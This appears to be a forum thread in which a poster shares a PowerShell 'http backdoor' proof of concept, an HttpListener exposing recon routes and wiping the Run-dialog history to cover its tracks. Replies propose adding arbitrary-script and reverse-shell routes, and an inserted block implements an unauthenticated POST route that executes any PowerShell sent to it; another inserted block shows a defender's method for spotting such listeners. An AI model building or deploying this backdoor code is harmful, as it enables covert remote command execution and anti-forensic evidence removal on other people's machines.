jOte- Posted March 26, 2018

############## powershell http backdoor...

```powershell
$cHOST = 'localhost'   # '0.0.0.0' needs admin
$cPORT = 8080
$URL   = "http://$($cHOST):$($cPORT)/"

# Route table: key is "<METHOD> <path>", value is the script block that builds the response body.
$ROUTES = @{
    "GET /exit"                    = { EXIT }   # terminates the PowerShell process
    "GET /isadmin"                 = { return "$(& net session 2>&1 | Out-String)" }   # 'net session' prints an access-denied error unless elevated
    "GET /ipconfig"                = { return "$(& ipconfig 2>&1 | Out-String)" }
    "GET /ipconfigall"             = { return "$(& ipconfig /all 2>&1 | Out-String)" }
    "GET /trol/flipscreen"         = { return "flipscreen" }           # returns only its name in this PoC
    "GET /trol/switchmousebuttons" = { return "switchmousebuttons" }   # returns only its name in this PoC
}

$LISTENER = New-Object System.Net.HttpListener
$LISTENER.Prefixes.Add($URL)
$LISTENER.Start()

While ($LISTENER.IsListening) {
    # First pass only: wipe the Run-dialog history (RunMRU) so the launch command is not left behind.
    If ($START -eq $null) {
        Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
        $START = 1
    }

    $CONTEXT  = $LISTENER.GetContext()   # blocks until a request arrives
    $REQUEST  = $CONTEXT.Request
    $RESPONSE = $CONTEXT.Response

    # Look up "METHOD /path" in the route table; unknown routes get a bare 404.
    $RECEIVED = '{0} {1}' -f $REQUEST.HttpMethod, $REQUEST.Url.LocalPath
    $ROUTE    = $ROUTES.Get_Item($RECEIVED)
    If ($ROUTE -eq $null) {
        $RESPONSE.StatusCode = 404
    } Else {
        $CONTENT = & $($ROUTE)
        $CONTENT = "<pre>$($CONTENT)</pre>"
        $BUFFER  = [System.Text.Encoding]::UTF8.GetBytes($CONTENT)
        $RESPONSE.ContentLength64 = $BUFFER.Length
        $RESPONSE.OutputStream.Write($BUFFER, 0, $BUFFER.Length)
    }
    $RESPONSE.Close()
}
```
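Added example, not part of jOte-'s post: how a defender would spot a PowerShell-hosted HttpListener like the one above. The catch is that HttpListener registers its URL with HTTP.sys, so `Get-NetTCPConnection` reports the listening port as owned by PID 4 (System), not by powershell.exe; the request-queue view of `netsh http show servicestate` is what ties a registered URL back to the real process. The parser below assumes the output layout shown in the constructed sample (a "Process IDs:" list followed later by a "Registered URLs:" list per queue); the function names are mine.

```powershell
# Added example: parse the HTTP.sys request-queue listing and map registered URLs to owning processes.
# Assumption: netsh output has the shape of the constructed $sample below.

function Get-HttpSysRegistration {
    param([string[]]$ServiceState)   # lines from: netsh http show servicestate view=requestq
    $queues = @()
    $pids = @(); $urls = @(); $mode = ''
    foreach ($raw in $ServiceState) {
        $line = $raw.Trim()
        if ($line -match '^Process IDs:') {
            # a new request queue starts here; flush the previous one
            if ($pids.Count -or $urls.Count) { $queues += [pscustomobject]@{ Pids = $pids; Urls = $urls } }
            $pids = @(); $urls = @(); $mode = 'pids'; continue
        }
        if ($line -match '^Registered URLs:') { $mode = 'urls'; continue }
        if ($mode -eq 'pids' -and $line -match '^\d+$')      { $pids += [int]$line; continue }
        if ($mode -eq 'urls' -and $line -match '^HTTPS?://') { $urls += $line;      continue }
        if ($line -ne '') { $mode = '' }   # any other non-empty line ends the current list
    }
    if ($pids.Count -or $urls.Count) { $queues += [pscustomobject]@{ Pids = $pids; Urls = $urls } }
    return $queues
}

function Find-PowerShellHttpListener {
    param([string[]]$ServiceState)
    foreach ($q in Get-HttpSysRegistration -ServiceState $ServiceState) {
        foreach ($procId in $q.Pids) {
            $proc = Get-Process -Id $procId -ErrorAction SilentlyContinue
            if ($proc -and $proc.ProcessName -match '^(powershell|pwsh)$') {
                [pscustomobject]@{ ProcessId = $procId; Process = $proc.ProcessName; Urls = ($q.Urls -join ', ') }
            }
        }
    }
}

# Constructed sample of the netsh output (not captured from a real host), used to exercise the parser offline.
$sample = @'
Request queues:

    Request queue name: Request queue is unnamed.
        Version: 2.0
        State: Active
        Number of active processes attached: 1
        Process IDs:
            4242
        URL groups:
        URL group ID: FF00000040000001
            State: Active
            Number of registered URLs: 1
            Registered URLs:
                HTTP://LOCALHOST:8080/
'@ -split "`r?`n"

Get-HttpSysRegistration -ServiceState $sample   # one queue: Pids {4242}, Urls {HTTP://LOCALHOST:8080/}

# Live hunt on a Windows host (PID 4242 above is made up; real PIDs come from netsh):
# Find-PowerShellHttpListener -ServiceState (netsh http show servicestate view=requestq)
```

A second indicator worth pairing with this is the RunMRU wipe the PoC performs: an empty `HKCU:\...\Explorer\RunMRU` key on a workstation whose user habitually uses the Run dialog is not proof of anything, but next to a PowerShell process holding an HTTP.sys registration it is a reasonable pivot.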
jOte- (Author) Posted March 26, 2018

This is just a proof of concept... I'm not intending to send full scripts....
Dave-ee Jones Posted March 26, 2018

3 hours ago, jOte- said: ############## powershell http backdoor...
Looks interesting.

2 hours ago, jOte- said: this is just a proof of concept... I'm not intending to send full scripts....
Okay.

1 hour ago, jOte- said: some people will understand....
Yes.

1 hour ago, jOte- said: BTW... who is that "thehappydinoa" noob??? Killing my entries with his stupid questions...
No idea.
PoSHMagiC0de Posted March 27, 2018

Hmm, a dirty web server as a malicious service. I've been experimenting with using HttpListener in PowerShell as a PSJob to get payload jobs from. Never thought about using it the way you use it, because normally binding to a port in Windows requires admin. Don't know if that applies only to ports < 1024. To improve the code I would check for admin, and you could add a URL that accepts a PowerShell script as a string to invoke. :-)
Dave-ee Jones Posted March 28, 2018

9 hours ago, PoSHMagiC0de said: To improve the code I would check for admin, and you could add a URL that accepts a PowerShell script as a string to invoke. :-)

On 3/27/2018 at 6:11 AM, jOte- said: "GET /isadmin" = { return "$(& net session 2>&1 | Out-String)" };

He has a URL to check for admin or not; however, since I don't have the rest of his code I can't tell what else it's doing there.

I knew you would bring up psh. :P If cmd, why not psh? Having some other commands like

GET /ispsh
GET /reversepsh
GET /sendpsh

even with a CLI tool on it would be interesting.
PoSHMagiC0de Posted March 28, 2018

Of course, if it is psh, I may come a-callin'. :-) Actually, what I meant by the admin check was that when running the backdoor it checks whether it is being run with enough permission to open the port. That admin check he is using net session for could be done in PowerShell for more accurate results.
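Added example, not code from any poster in this thread: the PoC reworked with the three suggestions made above (PoSHMagiC0de's pre-bind admin check and script-string route, Dave-ee Jones's psh-flavoured routes, and the WindowsPrincipal-based admin check in place of `net session`). It stays bound to localhost, as in the original; the `/psh` route takes the script in a POST body, and `/exit` stops the listener cleanly instead of killing the process. Function and route names are my own choices.

```powershell
# Added example: admin check before binding, a real IsInRole admin test, and a route that
# invokes a PowerShell script string sent in the request body. Loopback only by assumption.

function Test-IsAdmin {
    # WindowsPrincipal answers the question directly; 'net session' only infers it from an error.
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    $p  = New-Object Security.Principal.WindowsPrincipal($id)
    return $p.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
}

function Invoke-ScriptString {
    param([string]$Script)
    # Run the supplied text; non-terminating errors are merged into the output, terminating ones are caught.
    try   { $out = & ([scriptblock]::Create($Script)) 2>&1 | Out-String }
    catch { $out = $_ | Out-String }
    return $out
}

$cHOST = 'localhost'   # anything other than localhost needs an elevated session to bind
$cPORT = 8080
$URL   = "http://$($cHOST):$($cPORT)/"

# Fail early instead of letting HttpListener.Start() throw access-denied for a prefix that needs elevation.
if ($cHOST -ne 'localhost' -and -not (Test-IsAdmin)) {
    Write-Error "Binding to $URL requires an elevated PowerShell session."
    return
}

$RUNNING = $true
$ROUTES = @{
    "GET /isadmin" = { return "IsAdmin: $(Test-IsAdmin)" }
    "GET /ispsh"   = { return "PowerShell $($PSVersionTable.PSVersion) pid $PID" }
    # Script arrives in the POST body, e.g.:
    #   Invoke-WebRequest -Uri http://localhost:8080/psh -Method Post -Body 'Get-Date; whoami'
    "POST /psh"    = {
        param($Request)
        $reader = New-Object IO.StreamReader($Request.InputStream, $Request.ContentEncoding)
        $script = $reader.ReadToEnd()
        $reader.Close()
        return Invoke-ScriptString -Script $script
    }
    "GET /exit"    = { $script:RUNNING = $false; return "stopping" }
}

$LISTENER = New-Object System.Net.HttpListener
$LISTENER.Prefixes.Add($URL)
$LISTENER.Start()

while ($RUNNING) {
    $ctx   = $LISTENER.GetContext()
    $key   = '{0} {1}' -f $ctx.Request.HttpMethod, $ctx.Request.Url.LocalPath
    $route = $ROUTES[$key]
    if ($null -eq $route) {
        $ctx.Response.StatusCode = 404
    } else {
        $content = & $route $ctx.Request          # routes that ignore the argument simply do not bind it
        $buffer  = [Text.Encoding]::UTF8.GetBytes("<pre>$content</pre>")
        $ctx.Response.ContentType     = 'text/html; charset=utf-8'
        $ctx.Response.ContentLength64 = $buffer.Length
        $ctx.Response.OutputStream.Write($buffer, 0, $buffer.Length)
    }
    $ctx.Response.Close()   # the /exit response is flushed before the listener is torn down
}
$LISTENER.Stop()
```

Two things to keep in mind when trying it: `/psh` runs whatever it is handed with the listener's own privileges and without authentication, which is exactly why the prefix stays on localhost, and `Invoke-WebRequest` needs `-UseBasicParsing` on older Windows PowerShell builds where Internet Explorer's first-run dialog has not been dismissed.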
jOte- Posted March 29, 2018 Author Posted March 29, 2018 https://github.com/SpiderLabs/portia/blob/master/modules/Start-WebServer.ps1 check this out!!!!